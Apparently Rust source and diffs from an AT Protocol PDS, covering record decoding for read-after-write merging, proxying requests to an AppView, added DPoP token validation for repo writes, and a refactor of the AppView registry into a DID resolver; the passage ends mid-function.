#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct PostRecord {
    /// `$type` discriminator (e.g. the record's lexicon NSID).
    #[serde(rename = "$type")]
    pub record_type: Option<String>,
    pub text: String,
    pub created_at: String,
    /// Reply reference (parent/root refs) as opaque JSON.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub reply: Option<Value>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub embed: Option<Value>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub langs: Option<Vec<String>>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub labels: Option<Value>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub tags: Option<Vec<String>>,
    /// Catch-all for unmodeled fields.
    #[serde(flatten)]
    pub extra: HashMap<String, Value>,
}
/// Partial decode of an `app.bsky.actor.profile` record.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ProfileRecord {
    /// `$type` discriminator.
    #[serde(rename = "$type")]
    pub record_type: Option<String>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub display_name: Option<String>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub description: Option<String>,
    /// Avatar blob reference as opaque JSON.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub avatar: Option<Value>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub banner: Option<Value>,
    /// Catch-all for unmodeled fields.
    #[serde(flatten)]
    pub extra: HashMap<String, Value>,
}
/// A decoded record plus the metadata needed to present it: its AT-URI,
/// CID, and the timestamp at which it was indexed locally.
#[derive(Debug, Clone)]
pub struct RecordDescript<T> {
    pub uri: String,
    pub cid: String,
    pub indexed_at: DateTime<Utc>,
    pub record: T,
}
/// Partial decode of an `app.bsky.feed.like` record.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct LikeRecord {
    /// `$type` discriminator.
    #[serde(rename = "$type")]
    pub record_type: Option<String>,
    /// Strong reference (uri + cid) to the liked post.
    pub subject: LikeSubject,
    pub created_at: String,
    /// Catch-all for unmodeled fields.
    #[serde(flatten)]
    pub extra: HashMap<String, Value>,
}
/// Strong reference to a record: its AT-URI and content hash.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct LikeSubject {
    pub uri: String,
    pub cid: String,
}
/// Records written locally after the AppView's last-seen repo rev,
/// bucketed by collection for the read-after-write merge.
#[derive(Debug, Default)]
pub struct LocalRecords {
    /// Number of records whose blocks could actually be loaded
    /// (includes records of collections not bucketed below).
    pub count: usize,
    pub profile: Option<RecordDescript<ProfileRecord>>,
    pub posts: Vec<RecordDescript<PostRecord>>,
    pub likes: Vec<RecordDescript<LikeRecord>>,
}
/// Collect the user's records written after repo rev `rev`, decode them
/// from the block store, and bucket them into profile/posts/likes.
///
/// Returns an empty `LocalRecords` (not an error) when nothing is newer
/// than `rev` or when the sanity check below fails.
pub async fn get_records_since_rev(
    state: &AppState,
    did: &str,
    rev: &str,
) -> Result<LocalRecords, String> {
    let mut result = LocalRecords::default();
    let user_id: Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
        .fetch_optional(&state.db)
        .await
        .map_err(|e| format!("DB error: {}", e))?
        .ok_or_else(|| "User not found".to_string())?;
    // String comparison on repo_rev — assumes revs are lexically sortable
    // (TID-style); NOTE(review): LIMIT 10 looks small for a sync window,
    // confirm it is intentional.
    let rows = sqlx::query!(
        r#"
        SELECT record_cid, collection, rkey, created_at, repo_rev
        FROM records
        WHERE repo_id = $1 AND repo_rev > $2
        ORDER BY repo_rev ASC
        LIMIT 10
        "#,
        user_id,
        rev
    )
    .fetch_all(&state.db)
    .await
    .map_err(|e| format!("DB error fetching records: {}", e))?;
    if rows.is_empty() {
        return Ok(result);
    }
    // Guard against a bogus/foreign rev: if nothing exists at or before
    // `rev`, the diff cannot be trusted, so return nothing.
    let sanity_check = sqlx::query_scalar!(
        "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1",
        user_id,
        rev
    )
    .fetch_optional(&state.db)
    .await
    .map_err(|e| format!("DB error sanity check: {}", e))?;
    if sanity_check.is_none() {
        warn!("Sanity check failed: no records found before rev {}", rev);
        return Ok(result);
    }
    // Row metadata kept alongside parsed CIDs; the two vectors stay
    // index-aligned for the batched block fetch below.
    struct RowData {
        cid_str: String,
        collection: String,
        rkey: String,
        created_at: DateTime<Utc>,
    }
    let mut row_data: Vec<RowData> = Vec::with_capacity(rows.len());
    let mut cids: Vec<Cid> = Vec::with_capacity(rows.len());
    for row in &rows {
        // Rows with unparseable CIDs are silently skipped.
        if let Ok(cid) = row.record_cid.parse::<Cid>() {
            cids.push(cid);
            row_data.push(RowData {
                cid_str: row.record_cid.clone(),
                collection: row.collection.clone(),
                rkey: row.rkey.clone(),
                created_at: row.created_at,
            });
        }
    }
    // Single batched block-store round trip; one Option per requested CID.
    let blocks: Vec<Option<Bytes>> = state
        .block_store
        .get_many(&cids)
        .await
        .map_err(|e| format!("Error fetching blocks: {}", e))?;
    for (data, block_opt) in row_data.into_iter().zip(blocks.into_iter()) {
        let block_bytes = match block_opt {
            Some(b) => b,
            None => continue,
        };
        result.count += 1;
        let uri = format!("at://{}/{}/{}", did, data.collection, data.rkey);
        // Only the collections the merge code understands are decoded;
        // undecodable records are skipped but still counted above.
        if data.collection == "app.bsky.actor.profile" && data.rkey == "self" {
            if let Ok(record) = serde_ipld_dagcbor::from_slice::<ProfileRecord>(&block_bytes) {
                result.profile = Some(RecordDescript {
                    uri,
                    cid: data.cid_str,
                    indexed_at: data.created_at,
                    record,
                });
            }
        } else if data.collection == "app.bsky.feed.post" {
            if let Ok(record) = serde_ipld_dagcbor::from_slice::<PostRecord>(&block_bytes) {
                result.posts.push(RecordDescript {
                    uri,
                    cid: data.cid_str,
                    indexed_at: data.created_at,
                    record,
                });
            }
        } else if data.collection == "app.bsky.feed.like"
            && let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) {
            result.likes.push(RecordDescript {
                uri,
                cid: data.cid_str,
                indexed_at: data.created_at,
                record,
            });
        }
    }
    Ok(result)
}
/// Milliseconds elapsed since the oldest locally merged record was indexed,
/// or `None` when `local` holds no profile, posts, or likes.
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
    // Gather every indexed_at we know about and take the minimum.
    let profile_ts = local.profile.as_ref().map(|p| p.indexed_at);
    let post_ts = local.posts.iter().map(|p| p.indexed_at);
    let like_ts = local.likes.iter().map(|l| l.indexed_at);
    profile_ts
        .into_iter()
        .chain(post_ts)
        .chain(like_ts)
        .min()
        .map(|oldest| (Utc::now() - oldest).num_milliseconds())
}
/// Read the upstream repo revision from the `atproto-repo-rev` header,
/// if present and valid ASCII.
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
    let raw = headers.get(REPO_REV_HEADER)?;
    raw.to_str().ok().map(|s| s.to_owned())
}
/// Captured upstream AppView reply: status, the subset of headers we
/// forward, and the raw body bytes.
#[derive(Debug)]
pub struct ProxyResponse {
    pub status: StatusCode,
    pub headers: HeaderMap,
    pub body: bytes::Bytes,
}
impl ProxyResponse {
    /// Convert the captured upstream reply into an axum [`Response`],
    /// copying status, headers, and body verbatim.
    pub fn into_response(self) -> Response {
        let mut builder = Response::builder().status(self.status);
        for (name, value) in &self.headers {
            builder = builder.header(name, value);
        }
        // The parts came from an already-valid StatusCode and HeaderMap,
        // so the builder cannot fail here.
        builder.body(axum::body::Body::from(self.body)).unwrap()
    }
}
/// Resolve the AppView responsible for `method` via the registry, then
/// proxy the request to it. Fails with a ready-to-send error response when
/// no AppView is configured for the method.
pub async fn proxy_to_appview_via_registry(
    state: &AppState,
    method: &str,
    params: &HashMap<String, String>,
    auth_did: &str,
    auth_key_bytes: Option<&[u8]>,
) -> Result<ProxyResponse, Response> {
    let resolved = match state.appview_registry.get_appview_for_method(method).await {
        Some(r) => r,
        None => {
            return Err(ApiError::UpstreamUnavailable(format!(
                "No AppView configured for method: {}",
                method
            ))
            .into_response());
        }
    };
    proxy_to_appview_with_url(
        method,
        params,
        auth_did,
        auth_key_bytes,
        &resolved.url,
        &resolved.did,
    )
    .await
}
/// Proxy a GET XRPC call to a specific AppView, optionally authenticating
/// with a service token minted from the caller's repo key.
///
/// On success returns the captured reply (status, filtered headers, body);
/// on failure returns a ready-to-send error `Response`.
pub async fn proxy_to_appview_with_url(
    method: &str,
    params: &HashMap<String, String>,
    auth_did: &str,
    auth_key_bytes: Option<&[u8]>,
    appview_url: &str,
    appview_did: &str,
) -> Result<ProxyResponse, Response> {
    // Never forward to a private/loopback address, even if DID resolution
    // was poisoned.
    if let Err(e) = is_ssrf_safe(appview_url) {
        error!("SSRF check failed for appview URL: {}", e);
        return Err(
            ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(),
        );
    }
    let target_url = format!("{}/xrpc/{}", appview_url, method);
    info!(target = %target_url, "Proxying request to appview");
    let client = proxy_client();
    let mut request_builder = client.get(&target_url).query(params);
    // Only attach auth when the caller has a signing key; anonymous
    // requests go out without an Authorization header.
    if let Some(key_bytes) = auth_key_bytes {
        match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) {
            Ok(service_token) => {
                request_builder =
                    request_builder.header("Authorization", format!("Bearer {}", service_token));
            }
            Err(e) => {
                error!(error = ?e, "Failed to create service token");
                return Err(ApiError::InternalError.into_response());
            }
        }
    }
    match request_builder.send().await {
        Ok(resp) => {
            let status =
                StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
            // Forward only an allow-listed subset of upstream headers.
            let headers: HeaderMap = resp
                .headers()
                .iter()
                .filter(|(k, _)| {
                    RESPONSE_HEADERS_TO_FORWARD
                        .iter()
                        .any(|h| k.as_str().eq_ignore_ascii_case(h))
                })
                .filter_map(|(k, v)| {
                    let name = axum::http::HeaderName::try_from(k.as_str()).ok()?;
                    let value = HeaderValue::from_bytes(v.as_bytes()).ok()?;
                    Some((name, value))
                })
                .collect();
            // Enforce the size cap twice: first on the declared
            // Content-Length, then on the actual body (the header can lie).
            let content_length = resp.content_length().unwrap_or(0);
            if content_length > MAX_RESPONSE_SIZE {
                error!(
                    content_length,
                    max = MAX_RESPONSE_SIZE,
                    "Upstream response too large"
                );
                return Err(ApiError::UpstreamFailure.into_response());
            }
            let body = resp.bytes().await.map_err(|e| {
                error!(error = ?e, "Error reading proxy response body");
                ApiError::UpstreamFailure.into_response()
            })?;
            if body.len() as u64 > MAX_RESPONSE_SIZE {
                error!(
                    len = body.len(),
                    max = MAX_RESPONSE_SIZE,
                    "Upstream response body exceeded size limit"
                );
                return Err(ApiError::UpstreamFailure.into_response());
            }
            Ok(ProxyResponse {
                status,
                headers,
                body,
            })
        }
        Err(e) => {
            error!(error = ?e, "Error sending proxy request");
            // Map transport failures to distinct upstream error categories.
            if e.is_timeout() {
                Err(ApiError::UpstreamTimeout.into_response())
            } else if e.is_connect() {
                Err(
                    ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string())
                        .into_response(),
                )
            } else {
                Err(ApiError::UpstreamFailure.into_response())
            }
        }
    }
}
/// Serialize `data` as a 200 JSON response, attaching the local-lag header
/// (`atproto-upstream-lag`, in milliseconds) when a lag value is known.
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
    let mut response = (StatusCode::OK, Json(data)).into_response();
    if let Some(lag_ms) = lag {
        if let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) {
            response
                .headers_mut()
                .insert(UPSTREAM_LAG_HEADER, header_val);
        }
    }
    response
}
/// Minimal author view embedded in locally synthesized posts.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct AuthorView {
    pub did: String,
    pub handle: String,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub display_name: Option<String>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub avatar: Option<String>,
    /// Catch-all so upstream author fields survive round-trips.
    #[serde(flatten)]
    pub extra: HashMap<String, Value>,
}
/// A post as presented in feeds/threads.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct PostView {
    pub uri: String,
    pub cid: String,
    pub author: AuthorView,
    /// The raw post record as JSON.
    pub record: Value,
    pub indexed_at: String,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub embed: Option<Value>,
    // Engagement counters default to 0 when the upstream omits them.
    #[serde(default)]
    pub reply_count: i64,
    #[serde(default)]
    pub repost_count: i64,
    #[serde(default)]
    pub like_count: i64,
    #[serde(default)]
    pub quote_count: i64,
    /// Catch-all so upstream post fields survive round-trips.
    #[serde(flatten)]
    pub extra: HashMap<String, Value>,
}
/// A feed item: a post plus optional reply/repost context.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct FeedViewPost {
    pub post: PostView,
    /// Reply context as opaque JSON, when this item is a reply.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub reply: Option<Value>,
    /// Reason (e.g. repost attribution) as opaque JSON.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub reason: Option<Value>,
    #[serde(skip_serializing_if = "Option::is_none")]
    pub feed_context: Option<String>,
    /// Catch-all so upstream fields survive round-trips.
    #[serde(flatten)]
    pub extra: HashMap<String, Value>,
}
/// Response body for feed endpoints (e.g. `app.bsky.feed.getTimeline`).
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FeedOutput {
    pub feed: Vec<FeedViewPost>,
    /// Pagination cursor; omitted when there are no further pages.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub cursor: Option<String>,
}
/// Build a `PostView` for a locally stored post that the upstream AppView
/// has not indexed yet. Engagement counters are zero and the avatar is
/// omitted, since no indexer data is available for local records.
pub fn format_local_post(
    descript: &RecordDescript<PostRecord>,
    author_did: &str,
    author_handle: &str,
    profile: Option<&RecordDescript<ProfileRecord>>,
) -> PostView {
    // Prefer the display name from the user's local profile record, if any.
    let author = AuthorView {
        did: author_did.to_string(),
        handle: author_handle.to_string(),
        display_name: profile.and_then(|p| p.record.display_name.clone()),
        avatar: None,
        extra: HashMap::new(),
    };
    let record_json = serde_json::to_value(&descript.record).unwrap_or(Value::Null);
    PostView {
        uri: descript.uri.clone(),
        cid: descript.cid.clone(),
        author,
        record: record_json,
        indexed_at: descript.indexed_at.to_rfc3339(),
        embed: descript.record.embed.clone(),
        reply_count: 0,
        repost_count: 0,
        like_count: 0,
        quote_count: 0,
        extra: HashMap::new(),
    }
}
/// Wrap local posts as bare feed items, append them to `feed`, and re-sort
/// the whole feed newest-first by `indexed_at`.
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
    if posts.is_empty() {
        return;
    }
    feed.extend(posts.into_iter().map(|post| FeedViewPost {
        post,
        reply: None,
        reason: None,
        feed_context: None,
        extra: HashMap::new(),
    }));
    // Stable sort keeps the relative order of items with equal timestamps.
    feed.sort_by(|lhs, rhs| rhs.post.indexed_at.cmp(&lhs.post.indexed_at));
}

View File

@@ -1,75 +1,21 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
extract::{Query, RawQuery, State},
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
use serde::Deserialize;
use serde_json::json;
use tracing::{error, info};
#[derive(Deserialize)]
pub struct DescribeRepoInput {
pub repo: String,
}
/// Forward a `com.atproto.repo.describeRepo` request to the configured
/// AppView when the repo is not hosted on this PDS.
///
/// Resolves the AppView endpoint via the registry, re-attaches the
/// caller's raw query string unchanged, and relays the upstream status,
/// content-type, and body back to the client. Returns 404 when no
/// AppView is registered for the method and 502 on upstream failures.
async fn proxy_describe_repo_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
    // No AppView mapped for this method: behave as if the repo does not exist.
    let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.describeRepo").await {
        Some(r) => r,
        None => {
            return (
                StatusCode::NOT_FOUND,
                Json(json!({"error": "NotFound", "message": "Repo not found"})),
            )
                .into_response();
        }
    };
    // Pass the original query string through verbatim so parameters
    // round-trip without re-encoding.
    let target_url = match raw_query {
        Some(q) => format!("{}/xrpc/com.atproto.repo.describeRepo?{}", resolved.url, q),
        None => format!("{}/xrpc/com.atproto.repo.describeRepo", resolved.url),
    };
    info!("Proxying describeRepo to AppView: {}", target_url);
    let client = proxy_client();
    match client.get(&target_url).send().await {
        Ok(resp) => {
            // Mirror the upstream status code; fall back to 502 if it
            // cannot be represented.
            let status =
                StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
            let content_type = resp
                .headers()
                .get("content-type")
                .and_then(|v| v.to_str().ok())
                .map(|s| s.to_string());
            match resp.bytes().await {
                Ok(body) => {
                    // Rebuild the response, preserving content-type when present.
                    let mut builder = Response::builder().status(status);
                    if let Some(ct) = content_type {
                        builder = builder.header("content-type", ct);
                    }
                    builder
                        .body(axum::body::Body::from(body))
                        .unwrap_or_else(|_| {
                            (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
                        })
                }
                Err(e) => {
                    // Upstream connection died mid-body.
                    error!("Error reading AppView response: {:?}", e);
                    (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
                }
            }
        }
        Err(e) => {
            // Request to the AppView failed outright (DNS, connect, TLS, ...).
            error!("Error proxying to AppView: {:?}", e);
            (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
        }
    }
}
pub async fn describe_repo(
State(state): State<AppState>,
Query(input): Query<DescribeRepoInput>,
RawQuery(raw_query): RawQuery,
) -> Response {
let user_row = if input.repo.starts_with("did:") {
sqlx::query!(
@@ -90,8 +36,19 @@ pub async fn describe_repo(
};
let (user_id, handle, did) = match user_row {
Ok(Some((id, handle, did))) => (id, handle, did),
_ => {
return proxy_describe_repo_to_appview(&state, raw_query.as_deref()).await;
Ok(None) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
}
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let collections_query = sqlx::query!(

View File

@@ -31,10 +31,11 @@ pub struct DeleteRecordInput {
pub async fn delete_record(
State(state): State<AppState>,
headers: HeaderMap,
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
Json(input): Json<DeleteRecordInput>,
) -> Response {
let (did, user_id, current_root_cid) =
match prepare_repo_write(&state, &headers, &input.repo).await {
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
Ok(res) => res,
Err(err_res) => return err_res,
};

View File

@@ -1,8 +1,7 @@
use crate::api::proxy_client::proxy_client;
use crate::state::AppState;
use axum::{
Json,
extract::{Query, RawQuery, State},
extract::{Query, State},
http::StatusCode,
response::{IntoResponse, Response},
};
@@ -12,7 +11,7 @@ use serde::{Deserialize, Serialize};
use serde_json::json;
use std::collections::HashMap;
use std::str::FromStr;
use tracing::{error, info};
use tracing::error;
#[derive(Deserialize)]
pub struct GetRecordInput {
@@ -22,69 +21,9 @@ pub struct GetRecordInput {
pub cid: Option<String>,
}
/// Forward a `com.atproto.repo.getRecord` request to the configured
/// AppView when the repo is not hosted on this PDS.
///
/// Same relay strategy as the other repo proxies: resolve the AppView
/// endpoint, forward the raw query string verbatim, and mirror the
/// upstream status/content-type/body. 404 when no AppView is
/// registered, 502 on upstream failures.
async fn proxy_get_record_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
    // No AppView mapped for this method: behave as if the repo does not exist.
    let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.getRecord").await {
        Some(r) => r,
        None => {
            return (
                StatusCode::NOT_FOUND,
                Json(json!({"error": "NotFound", "message": "Repo not found"})),
            )
                .into_response();
        }
    };
    // Preserve the caller's query string unchanged.
    let target_url = match raw_query {
        Some(q) => format!("{}/xrpc/com.atproto.repo.getRecord?{}", resolved.url, q),
        None => format!("{}/xrpc/com.atproto.repo.getRecord", resolved.url),
    };
    info!("Proxying getRecord to AppView: {}", target_url);
    let client = proxy_client();
    match client.get(&target_url).send().await {
        Ok(resp) => {
            // Mirror the upstream status; 502 if unrepresentable.
            let status =
                StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
            let content_type = resp
                .headers()
                .get("content-type")
                .and_then(|v| v.to_str().ok())
                .map(|s| s.to_string());
            match resp.bytes().await {
                Ok(body) => {
                    // Rebuild the response, preserving content-type when present.
                    let mut builder = Response::builder().status(status);
                    if let Some(ct) = content_type {
                        builder = builder.header("content-type", ct);
                    }
                    builder
                        .body(axum::body::Body::from(body))
                        .unwrap_or_else(|_| {
                            (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
                        })
                }
                Err(e) => {
                    // Upstream connection died mid-body.
                    error!("Error reading AppView response: {:?}", e);
                    (
                        StatusCode::BAD_GATEWAY,
                        Json(json!({"error": "UpstreamError"})),
                    )
                        .into_response()
                }
            }
        }
        Err(e) => {
            // Request to the AppView failed outright.
            error!("Error proxying to AppView: {:?}", e);
            (
                StatusCode::BAD_GATEWAY,
                Json(json!({"error": "UpstreamError"})),
            )
                .into_response()
        }
    }
}
pub async fn get_record(
State(state): State<AppState>,
Query(input): Query<GetRecordInput>,
RawQuery(raw_query): RawQuery,
) -> Response {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let user_id_opt = if input.repo.starts_with("did:") {
@@ -106,8 +45,19 @@ pub async fn get_record(
};
let user_id: uuid::Uuid = match user_id_opt {
Ok(Some(id)) => id,
_ => {
return proxy_get_record_to_appview(&state, raw_query.as_deref()).await;
Ok(None) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
}
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let record_row = sqlx::query!(
@@ -192,61 +142,9 @@ pub struct ListRecordsOutput {
pub records: Vec<serde_json::Value>,
}
/// Forward a `com.atproto.repo.listRecords` request to the configured
/// AppView when the repo is not hosted on this PDS.
///
/// Resolves the AppView endpoint via the registry, forwards the raw
/// query string verbatim, and mirrors the upstream
/// status/content-type/body. 404 when no AppView is registered for the
/// method, 502 on upstream failures.
async fn proxy_list_records_to_appview(state: &AppState, raw_query: Option<&str>) -> Response {
    // No AppView mapped for this method: behave as if the repo does not exist.
    let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.listRecords").await {
        Some(r) => r,
        None => {
            return (
                StatusCode::NOT_FOUND,
                Json(json!({"error": "NotFound", "message": "Repo not found"})),
            )
                .into_response();
        }
    };
    // Preserve the caller's query string (cursor, limit, etc.) unchanged.
    let target_url = match raw_query {
        Some(q) => format!("{}/xrpc/com.atproto.repo.listRecords?{}", resolved.url, q),
        None => format!("{}/xrpc/com.atproto.repo.listRecords", resolved.url),
    };
    info!("Proxying listRecords to AppView: {}", target_url);
    let client = proxy_client();
    match client.get(&target_url).send().await {
        Ok(resp) => {
            // Mirror the upstream status; 502 if unrepresentable.
            let status =
                StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY);
            let content_type = resp
                .headers()
                .get("content-type")
                .and_then(|v| v.to_str().ok())
                .map(|s| s.to_string());
            match resp.bytes().await {
                Ok(body) => {
                    // Rebuild the response, preserving content-type when present.
                    let mut builder = Response::builder().status(status);
                    if let Some(ct) = content_type {
                        builder = builder.header("content-type", ct);
                    }
                    builder
                        .body(axum::body::Body::from(body))
                        .unwrap_or_else(|_| {
                            (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response()
                        })
                }
                Err(e) => {
                    // Upstream connection died mid-body.
                    error!("Error reading AppView response: {:?}", e);
                    (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
                }
            }
        }
        Err(e) => {
            // Request to the AppView failed outright.
            error!("Error proxying to AppView: {:?}", e);
            (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()
        }
    }
}
pub async fn list_records(
State(state): State<AppState>,
Query(input): Query<ListRecordsInput>,
RawQuery(raw_query): RawQuery,
) -> Response {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let user_id_opt = if input.repo.starts_with("did:") {
@@ -268,8 +166,19 @@ pub async fn list_records(
};
let user_id: uuid::Uuid = match user_id_opt {
Ok(Some(id)) => id,
_ => {
return proxy_list_records_to_appview(&state, raw_query.as_deref()).await;
Ok(None) => {
return (
StatusCode::NOT_FOUND,
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
)
.into_response();
}
Err(_) => {
return (
StatusCode::INTERNAL_SERVER_ERROR,
Json(json!({"error": "InternalError"})),
)
.into_response();
}
};
let limit = input.limit.unwrap_or(50).clamp(1, 100);

View File

@@ -56,8 +56,10 @@ pub async fn prepare_repo_write(
state: &AppState,
headers: &HeaderMap,
repo_did: &str,
http_method: &str,
http_uri: &str,
) -> Result<(String, Uuid, Cid), Response> {
let token = crate::auth::extract_bearer_token_from_header(
let extracted = crate::auth::extract_auth_token_from_header(
headers.get("Authorization").and_then(|h| h.to_str().ok()),
)
.ok_or_else(|| {
@@ -67,15 +69,26 @@ pub async fn prepare_repo_write(
)
.into_response()
})?;
let auth_user = crate::auth::validate_bearer_token(&state.db, &token)
.await
.map_err(|_| {
(
StatusCode::UNAUTHORIZED,
Json(json!({"error": "AuthenticationFailed"})),
)
.into_response()
})?;
let dpop_proof = headers
.get("DPoP")
.and_then(|h| h.to_str().ok());
let auth_user = crate::auth::validate_token_with_dpop(
&state.db,
&extracted.token,
extracted.is_dpop,
dpop_proof,
http_method,
http_uri,
false,
)
.await
.map_err(|e| {
(
StatusCode::UNAUTHORIZED,
Json(json!({"error": e.to_string()})),
)
.into_response()
})?;
if repo_did != auth_user.did {
return Err((
StatusCode::FORBIDDEN,
@@ -172,10 +185,11 @@ pub struct CreateRecordOutput {
pub async fn create_record(
State(state): State<AppState>,
headers: HeaderMap,
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
Json(input): Json<CreateRecordInput>,
) -> Response {
let (did, user_id, current_root_cid) =
match prepare_repo_write(&state, &headers, &input.repo).await {
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
Ok(res) => res,
Err(err_res) => return err_res,
};
@@ -339,10 +353,11 @@ pub struct PutRecordOutput {
pub async fn put_record(
State(state): State<AppState>,
headers: HeaderMap,
axum::extract::OriginalUri(uri): axum::extract::OriginalUri,
Json(input): Json<PutRecordInput>,
) -> Response {
let (did, user_id, current_root_cid) =
match prepare_repo_write(&state, &headers, &input.repo).await {
match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await {
Ok(res) => res,
Err(err_res) => return err_res,
};

View File

@@ -1,6 +1,7 @@
use reqwest::Client;
use serde::{Deserialize, Serialize};
use std::collections::HashMap;
use std::sync::Arc;
use std::time::{Duration, Instant};
use tokio::sync::RwLock;
use tracing::{debug, error, info, warn};
@@ -22,24 +23,28 @@ pub struct DidService {
}
#[derive(Clone)]
struct CachedAppView {
struct CachedDid {
url: String,
did: String,
resolved_at: Instant,
}
pub struct AppViewRegistry {
namespace_to_did: HashMap<String, String>,
did_cache: RwLock<HashMap<String, CachedAppView>>,
#[derive(Debug, Clone)]
pub struct ResolvedService {
pub url: String,
pub did: String,
}
pub struct DidResolver {
did_cache: RwLock<HashMap<String, CachedDid>>,
client: Client,
cache_ttl: Duration,
plc_directory_url: String,
}
impl Clone for AppViewRegistry {
impl Clone for DidResolver {
fn clone(&self) -> Self {
Self {
namespace_to_did: self.namespace_to_did.clone(),
did_cache: RwLock::new(HashMap::new()),
client: self.client.clone(),
cache_ttl: self.cache_ttl,
@@ -48,31 +53,9 @@ impl Clone for AppViewRegistry {
}
}
#[derive(Debug, Clone)]
pub struct ResolvedAppView {
pub url: String,
pub did: String,
}
impl AppViewRegistry {
impl DidResolver {
pub fn new() -> Self {
let mut namespace_to_did = HashMap::new();
let bsky_did = std::env::var("APPVIEW_DID_BSKY")
.unwrap_or_else(|_| "did:web:api.bsky.app".to_string());
namespace_to_did.insert("app.bsky".to_string(), bsky_did.clone());
namespace_to_did.insert("com.atproto".to_string(), bsky_did);
for (key, value) in std::env::vars() {
if let Some(namespace) = key.strip_prefix("APPVIEW_DID_") {
let namespace = namespace.to_lowercase().replace('_', ".");
if namespace != "bsky" {
namespace_to_did.insert(namespace, value);
}
}
}
let cache_ttl_secs: u64 = std::env::var("APPVIEW_CACHE_TTL_SECS")
let cache_ttl_secs: u64 = std::env::var("DID_CACHE_TTL_SECS")
.ok()
.and_then(|v| v.parse().ok())
.unwrap_or(300);
@@ -87,16 +70,9 @@ impl AppViewRegistry {
.build()
.unwrap_or_else(|_| Client::new());
info!(
"AppView registry initialized with {} namespace mappings",
namespace_to_did.len()
);
for (ns, did) in &namespace_to_did {
debug!(" {} -> {}", ns, did);
}
info!("DID resolver initialized");
Self {
namespace_to_did,
did_cache: RwLock::new(HashMap::new()),
client,
cache_ttl: Duration::from_secs(cache_ttl_secs),
@@ -104,45 +80,12 @@ impl AppViewRegistry {
}
}
pub fn register_namespace(&mut self, namespace: &str, did: &str) {
info!("Registering AppView: {} -> {}", namespace, did);
self.namespace_to_did
.insert(namespace.to_string(), did.to_string());
}
pub async fn get_appview_for_method(&self, method: &str) -> Option<ResolvedAppView> {
let namespace = self.extract_namespace(method)?;
